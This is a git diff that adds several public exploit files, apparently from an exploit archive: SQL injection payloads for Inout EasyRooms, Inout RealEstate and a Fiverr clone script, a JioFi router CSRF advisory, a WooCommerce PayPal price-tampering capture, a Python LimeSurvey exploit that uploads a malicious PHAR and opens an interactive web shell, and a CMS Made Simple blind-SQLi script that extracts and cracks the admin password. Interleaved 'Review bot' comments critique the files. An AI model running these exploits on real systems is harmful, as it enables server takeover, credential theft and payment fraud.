diff --git a/exploits/hardware/webapps/46633.html b/exploits/hardware/webapps/46633.html new file mode 100644 index 000000000..ae0057727 --- /dev/null +++ b/exploits/hardware/webapps/46633.html 
@@ -0,0 +1,61 @@ +# Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi) +# Exploit Author: Vikas Chaudhary +# Date: 21-01-2019 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Contact: https://www.facebook.com/profile.php?id=100011287630308 +# Web: https://gkaim.com/ +# Tested on: Windows 10 X64- Firefox-65.0 +# CVE-2019-7440 +*********************************************************************** +## Vulnerability Description :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. + The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized +before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context +of an affected site. +---------------------------------------- +# Proof Of Concept:-PoC +1- First Open BurpSuite +2- Make Intercept on +3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] +4-Goto wifi edit section and click on apply +5-Now capture the data and generate CSRF PoC +6-Now Change the SSID name and Password (Security Key) According to you +7-Save it as .html and send it to Victim. +8-Victim's profile will be changed according to you +------------------- + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46630.txt b/exploits/php/webapps/46630.txt new file mode 100644 index 000000000..b243bb555 --- /dev/null +++ b/exploits/php/webapps/46630.txt @@ -0,0 +1,34 @@ +# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection +# Date: 29.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/ +# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/ +# Version: v1.0 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: http://localhost/[PATH]/search/rentals +Vulnerable Parameter: guests (POST) +Payload: guests=-1' OR 3*2*1=6 AND 00046=00046 -- + +----- PoC 2: SQLi ----- + +Request: http://localhost/[PATH]/search/searchdetailed +Vulnerable Parameter: location (POST) +Payload: location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'=' + +----- PoC 3: SQLi ----- + +Request: http://localhost/[PATH]/search/searchdetailed +Vulnerable Parameter: numguest (POST) +Payload: numguest=-1' OR 3*2*1=6 AND 000232=000232 -- + + +----- PoC 4: SQLi ----- + +Request: http://localhost/[PATH]/search/searchdetailed +Vulnerable Parameter: property1 (POST) +Payload: +property1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ \ No newline at end of file diff --git a/exploits/php/webapps/46631.txt b/exploits/php/webapps/46631.txt new file mode 100644 index 000000000..3f3aa4ae8 --- /dev/null +++ b/exploits/php/webapps/46631.txt 
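Review bot: The "Vulnerability Description" block in the header mixes two different issues: its first two sentences describe CSRF, which matches the title and the PoC steps, but the sentence beginning "The issue is triggered when an unauthorized input passed via multiple POST and GET parameters" describes reflected XSS ("execute arbitrary HTML and script code in a user's browser session"), which nothing else in the file supports. That sentence should be dropped unless the file also demonstrates a reflection, and "an unauthorized input ... are not properly sanitized" has a subject-verb mismatch either way. The hunk header announces 61 added lines, but only the commented header and blank lines are visible here, so the HTML form itself appears to have been lost in rendering and cannot be reviewed.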
@@ -0,0 +1,15 @@ +# Exploit Title: Inout RealEstate - SQL Injection +# Date: 29.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.inoutscripts.com/products/inout-realestate/ +# Demo Site: http://inout-realestate.demo.inoutscripts.net/ +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: http://localhost/[PATH]/agents/agentlistdetails +Vulnerable Parameter: city (POST) +Payload: brokername=&city=1' RLIKE (SELECT (CASE WHEN (8778=8778) THEN 1 +ELSE 0x28 END)) AND 'VZpy'='VZpy&cityname=e&page=1&sortby=1 \ No newline at end of file diff --git a/exploits/php/webapps/46632.txt b/exploits/php/webapps/46632.txt new file mode 100644 index 000000000..77c3729a7 --- /dev/null +++ b/exploits/php/webapps/46632.txt 
@@ -0,0 +1,75 @@ +# Exploit Title: cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price +# Date: 27.01.2019 +# Product Title :Woocommerce Paypal gateway Plugin +# Vendor Homepage: https://wordpress.org +# Software Link : https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ +# Category: Web Applications Plugin (Wordpress) +# Version: 1.6.8 +# Active installations: 700,000+ +# Exploit Author: Vikas Chaudhary +# Contact: https://gkaim.com/contact-us/ +# Web: https://gkaim.com/ +# Tested on: Windows 10 -Firefox . +# CVE-2019-7441 +***************************************************** +## VENDOR SUMMARY :- This is a PayPal Checkout Payment Gateway for WooCommerce. +PayPal Checkout allows you to securely sell your products and subscriptions online using In-Context Checkout to help you meet security requirements without causing your theme to suffer. In-Context Checkout uses a modal window, hosted on PayPalís servers, that overlays the checkout form and provides a secure means for your customers to enter their account information + +## Vulnerability Description => The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. +This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishes to attack a third-person using a Man-in-the-middle attack. In both cases, tools likes Webscarab and Paros proxy are mostly used. 
+__________________________________ +Proof Of Concept:- PoC +1 -Install Woocommerce Paypal checkout gateway plugin (1.6.8) in Remote. +2- Now fix a price of any product and configure it with this plguin. +3- Do checkout through paypal and capture the data from burp. +5- Here you will find post based request with amount parameter- Now Edit amount parameter as you want and forward it . +6- You will see a new price and you can purchase that product on your new edited price. +------------------- +Post REQUEST:- +GET /cgi-bin/webscr?cmd=_cart&business=gkaim100%40gmail.com&no_note=1¤cy_code=INR&charset=utf-8&rm=2&upload=1&return=https%3A%2F%2Fa2zcourse.com%2Fcheckout%2Forder-received%2F798%2F%3Fkey%3Dwc_order_wJp0p80pFSg8V%26utm_nooverride%3D1&cancel_return=https%3A%2F%2Fa2zcourse.com%2Fbasket%2F%3Fcancel_order%3Dtrue%26order%3Dwc_order_wJp0p80pFSg8V%26order_id%3D798%26redirect%26_wpnonce%3D68f71663cb&page_style=A2Zcourse.com&image_url=&paymentaction=sale&bn=WooThemes_Cart&invoice=A2Z-798&custom=%7B%22order_id%22%3A798%2C%22order_key%22%3A%22wc_order_wJp0p80pFSg8V%22%7D¬ify_url=https%3A%2F%2Fa2zcourse.com%2Fwc-api%2FWC_Gateway_Paypal%2F&first_name=dfkjk&last_name=v%3Blbkm&address1=&address2=&city=&state=&zip=&country=&email=sdflmnvkj%40xncv.com&night_phone_b=8908098090&no_shipping=1&tax_cart=0.00&item_name_1=Artificial+Intelligence+2018+Build+the+Most+Powerful+AI&quantity_1=1&amount_1=5000&item_number_1=Artificial+Intelligence+2018 HTTP/1.1 +Host: www.paypal.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://a2zcourse.com/checkout/ +Connection: close +Upgrade-Insecure-Requests: 1 +---------------- +Post RESPONSE:-- +HTTP/1.1 302 Moved Temporarily +Server: Apache +X-Recruiting: If you are reading this, maybe you should be working at PayPal instead! 
Check out https://www.paypal.com/us/webapps/mpp/paypal-jobs +Paypal-Debug-Id: 2f8e90a8c5e72 +Cache-Control: no-cache +x-content-type-options: nosniff +x-xss-protection: 1; mode=block +x-frame-options: SAMEORIGIN +content-security-policy: default-src 'self' https://*.paypal.com; script-src 'nonce-iJYgKZYXXhHUAluelfhZan+dO96W5x49hsgMXR3ZPHDRR/SI' 'self' https://*.paypal.com 'unsafe-inline' 'unsafe-eval'; img-src https://*.paypalobjects.com; object-src 'none'; font-src 'self' https://*.paypalobjects.com; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; block-all-mixed-content; report-uri https://www.paypal.com/csplog/api/log/csp +HTTP_X_PP_AZ_LOCATOR: dcg13.slc +Paypal-Debug-Id: 2f8e90a8c5e72 +Location: https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72 +Cache-Control: max-age=0, no-cache, no-store, must-revalidate +Pragma: no-cache +Content-Type: text/html; charset=utf-8 +DC: ccg11-origin-www-1.paypal.com +Content-Length: 302 +X-EdgeConnect-MidMile-RTT: 219 +X-EdgeConnect-Origin-MEX-Latency: 801 +Date: Sun, 27 Jan 2019 08:46:30 GMT +Connection: close +Vary: Accept-Encoding +Set-Cookie: tsrce=xorouternodeweb; Domain=.paypal.com; Path=/; Expires=Wed, 30 Jan 2019 08:46:30 GMT; HttpOnly; Secure +Set-Cookie: ts=vr%3D8e7d19d1168ac1200012cd39fff5bb0f%26vreXpYrS%3D1643249566%26vteXpYrS%3D1548580589%26vt%3D8e7d19d4168ac1200012cd39fff5bb0e; Domain=.paypal.com; Path=/; Expires=Thu, 27 Jan 2022 02:12:47 GMT; HttpOnly; Secure +Set-Cookie: nsid=s%3AU8TmrvBUulZLtqFmT9F1ZeoVNf4dKoAr.slyvmBwJFEJx4Uxt4mNU%2BJH%2BrDf5uxLrKECnBRm%2FQ0I; Path=/; HttpOnly; Secure +Set-Cookie: X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dxorouternodewebxclick%26TIME%3D3849276764%26HTTP_X_PP_AZ_LOCATOR%3Ddcg13.slc; Expires=Sun, 27 Jan 2019 09:16:30 GMT; domain=.paypal.com; path=/; Secure; HttpOnly +Set-Cookie: X-PP-SILOVER=; Expires=Thu, 01 Jan 1970 00:00:01 GMT +Set-Cookie: 
AKDC=ccg11-origin-www-1.paypal.com; expires=Sun, 27-Jan-2019 09:16:30 GMT; path=/; secure +Set-Cookie: akavpau_ppsd=1548579390~id=8b5783ec5a9b02390092591f951f54f8; Domain=www.paypal.com; Path=/; Secure; HttpOnly +Strict-Transport-Security: max-age=63072000 + +

Found. Redirecting to https://www.paypal.com/webapps/hermes?token=13V78288LV2795452&useraction=commit&rm=2&mfid=1548578790132_2f8e90a8c5e72

+ +--------------------------------------------------------- + +___________________________________ \ No newline at end of file diff --git a/exploits/php/webapps/46634.py b/exploits/php/webapps/46634.py new file mode 100755 index 000000000..e6f6a8d3a --- /dev/null +++ b/exploits/php/webapps/46634.py 
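Review bot: The section headed `Post REQUEST:-` shows a GET request to `/cgi-bin/webscr?cmd=_cart` on www.paypal.com, and `Post RESPONSE:--` follows the same mislabel; either the headings should say request/response or the PoC should show the POST that the steps describe. The numbered steps run 1, 2, 3, 5, 6, so one step is missing or misnumbered. The captured request and response still carry a business email, order key, WordPress nonce, PayPal token and several Set-Cookie values, none of which bear on the `amount_1` parameter the advisory is about; an advisory should redact such values before publication.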
@@ -0,0 +1,251 @@ +#!/usr/bin/python + +# Description: LimeSurvey < 3.16 use a old version of "TCPDF" library, this version is vulnerable to a Serialization Attack via the "phar://" wrapper. +# Date: 29/03/2019 +# Exploit Title: Remote Code Execution in LimeSurvey < 3.16 via Serialization Attack in TCPDF. +# Exploit Author: @q3rv0 +# Google Dork: +# Version: < 3.16 +# Tested on: LimeSurvey 3.15 +# PoC: https://www.secsignal.org/news/remote-code-execution-in-limesurvey-3-16-via-serialization-attack-in-tcpdf +# CVE: CVE-2018-17057 +# SecSignal is: <3 +# Usage: python exploit.py [URL] [USERNAME] [PASSWORD] + +import requests +import sys +import re + +SESSION = requests.Session() + +# Malicious PHAR generated with PHPGGC. +# ./phpggc Yii/RCE1 system "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > shell.php" -p phar -o /tmp/exploit.jpg + +PHAR = ("\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38" + "\x02\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x02\x00\x00\x4f\x3a\x31\x31\x3a\x22\x43\x44\x62" + "\x43\x72\x69\x74\x65\x72\x69\x61\x22\x3a\x31\x3a\x7b\x73\x3a\x36\x3a\x22\x70\x61\x72\x61\x6d\x73\x22\x3b\x4f\x3a\x31\x32" + "\x3a\x22\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x22\x3a\x33\x3a\x7b\x73\x3a\x31\x36\x3a\x22\x00\x43\x4d\x61\x70" + "\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x64\x22\x3b\x4f\x3a\x31\x30\x3a\x22\x43\x46\x69\x6c\x65\x43\x61\x63\x68\x65\x22" + "\x3a\x37\x3a\x7b\x73\x3a\x39\x3a\x22\x6b\x65\x79\x50\x72\x65\x66\x69\x78\x22\x3b\x73\x3a\x30\x3a\x22\x22\x3b\x73\x3a\x37" + "\x3a\x22\x68\x61\x73\x68\x4b\x65\x79\x22\x3b\x62\x3a\x30\x3b\x73\x3a\x31\x30\x3a\x22\x73\x65\x72\x69\x61\x6c\x69\x7a\x65" + "\x72\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x31\x3b\x73\x3a\x36\x3a\x22\x73\x79\x73\x74\x65\x6d\x22\x3b\x7d\x73\x3a\x39\x3a" + 
"\x22\x63\x61\x63\x68\x65\x50\x61\x74\x68\x22\x3b\x73\x3a\x31\x30\x3a\x22\x64\x61\x74\x61\x3a\x74\x65\x78\x74\x2f\x22\x3b" + "\x73\x3a\x31\x34\x3a\x22\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x4c\x65\x76\x65\x6c\x22\x3b\x69\x3a\x30\x3b\x73\x3a\x31\x31" + "\x3a\x22\x65\x6d\x62\x65\x64\x45\x78\x70\x69\x72\x79\x22\x3b\x62\x3a\x31\x3b\x73\x3a\x31\x35\x3a\x22\x63\x61\x63\x68\x65" + "\x46\x69\x6c\x65\x53\x75\x66\x66\x69\x78\x22\x3b\x73\x3a\x31\x34\x30\x3a\x22\x3b\x62\x61\x73\x65\x36\x34\x2c\x4f\x54\x6b" + "\x35\x4f\x54\x6b\x35\x4f\x54\x6b\x35\x4f\x57\x56\x6a\x61\x47\x38\x67\x4d\x32\x4d\x7a\x5a\x6a\x63\x77\x4e\x6a\x67\x33\x4d" + "\x44\x49\x77\x4e\x7a\x4d\x33\x4f\x54\x63\x7a\x4e\x7a\x51\x32\x4e\x54\x5a\x6b\x4d\x6a\x67\x79\x4e\x44\x56\x6d\x4e\x44\x63" + "\x30\x4e\x54\x55\x30\x4e\x57\x49\x79\x4d\x6a\x59\x7a\x4d\x6a\x49\x31\x5a\x44\x49\x35\x4d\x32\x49\x79\x4d\x44\x4e\x6d\x4d" + "\x32\x55\x77\x59\x53\x42\x38\x49\x48\x68\x34\x5a\x43\x41\x74\x63\x69\x41\x74\x63\x43\x41\x2b\x49\x48\x4e\x6f\x5a\x57\x78" + "\x73\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x22\x3b\x7d\x73\x3a\x31\x39\x3a\x22\x00\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f" + "\x72\x00\x5f\x6b\x65\x79\x73\x22\x3b\x61\x3a\x31\x3a\x7b\x69\x3a\x30\x3b\x69\x3a\x30\x3b\x7d\x73\x3a\x31\x38\x3a\x22\x00" + "\x43\x4d\x61\x70\x49\x74\x65\x72\x61\x74\x6f\x72\x00\x5f\x6b\x65\x79\x22\x3b\x69\x3a\x30\x3b\x7d\x7d\x08\x00\x00\x00\x74" + "\x65\x73\x74\x2e\x74\x78\x74\x04\x00\x00\x00\x36\xad\x9d\x5c\x04\x00\x00\x00\x0c\x7e\x7f\xd8\xb6\x01\x00\x00\x00\x00\x00" + "\x00\x74\x65\x73\x74\xcc\xd9\x99\xbd\x5e\x65\x4e\x03\x9b\x90\xdd\xd5\x8b\xff\x28\xd2\x37\x8b\x23\xe5\x02\x00\x00\x00\x47" + "\x42\x4d\x42") + +def usage(): + if len(sys.argv) != 4: + print "Usage: python exploit.py [URL] [USERNAME] [PASSWORD]" + sys.exit(0) + +def get(url): + r = SESSION.get(url, verify=False) + return r.text + +def post(url, data={}, files=None, headers=None): + r = SESSION.post(url, data=data, headers=headers, files=files, verify=False) + return r.text + +def 
getYIICSRFToken(url): + res = get(url) + token = re.findall(r'value="(.*)" name="YII_CSRF_TOKEN"', res) + return token[0] + +def getKCSRFToken(url): + res = get(url) + token = re.findall(r'csrftoken = "(.*)";', res) + return token[0] + +def login(url, username, password): + token = getYIICSRFToken(url) + data = {"YII_CSRF_TOKEN" : token, + "authMethod" : "Authdb", + "user" : username, + "password" : password, + "loginlang" : "default", + "action" : "login", + "width" : "1366", + "login_submit" : "login" + } + res = post(url, data) + if len(re.findall("loginform", res)) == 0: + return True + else: + return False + +def emailTemplates(url): + return get(url) + +def createSurvey(url_newsurvey, url_insert): + token = getYIICSRFToken(url_newsurvey) + data = {"YII_CSRF_TOKEN" : token, + "surveyls_title" : "Survey Example - SecSignal", + "language" : "en", + "createsample" : "0", + "description" : "foo", + "url" : "", + "urldescrip" : "", + "dateformat" : "1", + "numberformat_en": "0", + "welcome" : "bar", + "endtext" : "asdf", + "owner_id" : "1", + "admin" : "Administrator", + "adminemail" : "test%40gsecsignal.org", + "bounce_email" : "test%40gsecsignal.org", + "faxto" : "", + "gsid" : "1", + "format" : "G", + "template" : "fruity", + "navigationdelay": "0", + "questionindex" : "0", + "showgroupinfo" : "B", + "showqnumcode" : "X", + "shownoanswer" : "Y", + "showxquestions" : "0", + "showxquestions" : "1", + "showwelcome" : "0", + "showwelcome" : "1", + "allowprev" : "0", + "nokeyboard" : "0", + "showprogress" : "0", + "showprogress" : "1", + "printanswers" : "0", + "publicstatistics" : "0", + "publicgraphs" : "0", + "autoredirect" : "0", + "startdate" : "", + "expires" : "", + "listpublic" : "0", + "usecookie" : "0", + "usecaptcha_surveyaccess" : "0", + "usecaptcha_registration" : "0", + "usecaptcha_saveandload" : "0", + "datestamp" : "0", + "ipaddr" : "0", + "refurl" : "0", + "savetimings" : "0", + "assessments" : "0", + "allowsave" : "0", + "allowsave" : "1", + 
"emailnotificationto" : "", + "emailresponseto" : "", + "googleanalyticsapikeysetting" : "N", + "googleanalyticsstyle" : "0", + "tokenlength" : "15", + "anonymized" : "0", + "tokenanswerspersistence" : "0", + "alloweditaftercompletion" : "0", + "allowregister" : "0", + "htmlemail" : "0", + "htmlemail" : "1", + "sendconfirmation" : "0", + "sendconfirmation" : "1", + "saveandclose" : "1" + } + res = post(url_insert, data) + surveyid = re.findall(r'surveyid\\/([0-9]+)', res) + return surveyid[0] # Return SurveyiD + +def uploadPHAR(url_upload, url_csrf_token, phar): + kcfinder_csrftoken = getKCSRFToken(url_csrf_token) + files = {'upload[]': ('malicious.jpg', phar)} + data = {"dir" : "files", + "kcfinder_csrftoken" : kcfinder_csrftoken + } + res = post(url_upload, data, files) + return res + +def pdfExport(url_pdf_export, surveyid): + token = getYIICSRFToken(url_pdf_export + surveyid) + data = {"save_language" : "en", + "queXMLStyle" : '

Stage 2

', + "queXMLSingleResponseAreaHeight" : "9", + "queXMLSingleResponseHorizontalHeight" : "10.5", + "queXMLQuestionnaireInfoMargin" : "5", + "queXMLResponseTextFontSize" : "10", + "queXMLResponseLabelFontSize" : "7.5", + "queXMLResponseLabelFontSizeSmall" : "6.5", + "queXMLSectionHeight" : "18", + "queXMLBackgroundColourSection" : "221", + "queXMLBackgroundColourQuestion" : "241", + "queXMLAllowSplittingSingleChoiceHorizontal" : "0", + "queXMLAllowSplittingSingleChoiceHorizontal" : "1", + "queXMLAllowSplittingSingleChoiceVertical" : "0", + "queXMLAllowSplittingSingleChoiceVertical" : "1", + "queXMLAllowSplittingMatrixText" : "0", + "queXMLAllowSplittingMatrixText" : "1", + "queXMLAllowSplittingVas" : "0", + "queXMLPageOrientation" : "P", + "queXMLPageFormat" : "A4", + "queXMLEdgeDetectionFormat" : "lines", + "YII_CSRF_TOKEN" : token, + "ok" : "Y"} + res = post(url_pdf_export + surveyid, data) + return res + +def shell(url): + r = requests.get("%s/shell.php" % url) + if r.status_code == 200: + print "[+] Pwned! :)" + print "[+] Getting the shell..." + while 1: + try: + input = raw_input("$ ") + r = requests.get("%s/shell.php?c=%s" % (url, input)) + print r.text + except KeyboardInterrupt: + sys.exit("\nBye kaker!") + else: + print "[*] The site seems not to be vulnerable :(" + +def main(): + usage() + url = sys.argv[1] # URL + username = sys.argv[2] # Username + password = sys.argv[3] # Password + url_login = "%s/index.php/admin/authentication/sa/login" % url + + print "[*] Logging in to LimeSurvey..." + if login(url_login, username, password): + + url_newsurvey = "%s/index.php/admin/survey/sa/newsurvey" % url + url_insert = "%s/index.php/admin/survey/sa/insert" % url + + print "[*] Creating a new Survey..." 
+ surveyid = createSurvey(url_newsurvey, url_insert) + print "[+] SurveyID: %s" % surveyid + + email_templates = "%s/index.php/admin/emailtemplates/sa/index/surveyid/%s" % (url, surveyid) + + emailTemplates(email_templates) + + url_csrf_token = "%s/third_party/kcfinder/browse.php?opener=custom&type=files&CKEditor=email_invitation_en&langCode=en" % url + url_upload = "%s/third_party/kcfinder/browse.php?type=files&lng=en&opener=custom&act=upload" % url + + print "[*] Uploading a malicious PHAR..." + uploadPHAR(url_upload, url_csrf_token, PHAR) + + url_pdf_export = "%s/index.php/admin/export/sa/quexml/surveyid/" % url + + print "[*] Sending the Payload..." + export_response = pdfExport(url_pdf_export, surveyid) + print "[*] TCPDF Response: %s" % export_response + + shell(url) + else: + print "[-] Bad credentials :(" + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/46635.py b/exploits/php/webapps/46635.py new file mode 100755 index 000000000..49cfbdd13 --- /dev/null +++ b/exploits/php/webapps/46635.py 
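Review bot: `get()` and `post()` pass `verify=False` on every request, so the admin credentials taken from argv are sent to the target over a TLS connection whose certificate is never checked, and the script offers no way to turn verification on; verification should default to on with an explicit opt-out. `getYIICSRFToken()` and `getKCSRFToken()` index `token[0]` unguarded, so a page without the expected marker ends in a bare IndexError rather than a message; a guard such as `if not token: sys.exit("[-] CSRF token not found at %s" % url)` makes the failure mode explicit. The dict literals in `createSurvey()` and `pdfExport()` repeat keys (`showxquestions`, `showwelcome`, `showprogress`, `allowsave`, `htmlemail`, `sendconfirmation`, the `queXMLAllowSplitting*` entries), so only the last value of each is ever sent and the earlier entries are dead. As style points, `post()` uses a mutable default `data={}` and `shell()` rebinds the builtin name `input`.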
@@ -0,0 +1,186 @@ +#!/usr/bin/env python +# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 +# Date: 30-03-2019 +# Exploit Author: Daniele Scanu @ Certimeter Group +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ +# Version: <= 2.2.9 +# Tested on: Ubuntu 18.04 LTS +# CVE : CVE-2019-9053 + +import requests +from termcolor import colored +import time +from termcolor import cprint +import optparse +import hashlib + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)") +parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") +parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) + +options, args = parser.parse_args() +if not options.url: + print "[+] Specify an url target" + print "[+] Example usage (no cracking password): exploit.py -u http://target-uri" + print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist" + print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based." 
+ exit() + +url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' +session = requests.Session() +dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' +flag = True +password = "" +temp_password = "" +TIME = 1 +db_name = "" +output = "" +email = "" + +salt = '' +wordlist = "" +if options.wordlist: + wordlist += options.wordlist + +def crack_password(): + global password + global output + global wordlist + global salt + dict = open(wordlist) + for line in dict.readlines(): + line = line.replace("\n", "") + beautify_print_try(line) + if hashlib.md5(str(salt) + line).hexdigest() == password: + output += "\n[+] Password cracked: " + line + break + dict.close() + +def beautify_print_try(value): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + cprint('[*] Try: ' + value, 'red', attrs=['bold']) + +def beautify_print(): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + +def dump_salt(): + global flag + global salt + global output + ord_salt = "" + ord_salt_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_salt = salt + dictionary[i] + ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_salt) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + salt = temp_salt + ord_salt = ord_salt_temp + flag = True + output += '\n[+] Salt for password found: ' + salt + +def dump_password(): + global flag + global password + global output + ord_password = "" + ord_password_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_password = password + dictionary[i] + ord_password_temp = 
ord_password + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_password) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users" + payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + password = temp_password + ord_password = ord_password_temp + flag = True + output += '\n[+] Password found: ' + password + +def dump_username(): + global flag + global db_name + global output + ord_db_name = "" + ord_db_name_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_db_name = db_name + dictionary[i] + ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_db_name) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + db_name = temp_db_name + ord_db_name = ord_db_name_temp + output += '\n[+] Username found: ' + db_name + flag = True + +def dump_email(): + global flag + global email + global output + ord_email = "" + ord_email_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_email = email + dictionary[i] + ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_email) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + 
email = temp_email + ord_email = ord_email_temp + output += '\n[+] Email found: ' + email + flag = True + +dump_salt() +dump_username() +dump_email() +dump_password() + +if options.cracking: + print colored("[*] Now try to crack password") + crack_password() + +beautify_print() \ No newline at end of file diff --git a/exploits/php/webapps/46637.txt b/exploits/php/webapps/46637.txt new file mode 100644 index 000000000..16ea9cb2a --- /dev/null +++ b/exploits/php/webapps/46637.txt @@ -0,0 +1,17 @@ +# Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan@gmail.com +# Discovery Date: Apr 1, 2019 +# Vendor Homepage: https://www.phpscriptsmall.com +# Software Link : https://www.phpscriptsmall.com/product/fiverr-clone-script/ +# Tested Version: 1.2.2 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# http://localhost/?page=[SQLi] +# http://localhost/search-results.php?category=[Category id]&subcategory=[Subcategory id]&keyword=[XSS] + +# http://localhost/?page=2%20%27%20OR%201%20=%201%20-- +# http://localhost/search-results.php?category=32&subcategory=63&keyword=&project_search=# \ No newline at end of file diff --git a/exploits/php/webapps/46638.py b/exploits/php/webapps/46638.py new file mode 100755 index 000000000..142462ebe --- /dev/null +++ b/exploits/php/webapps/46638.py 
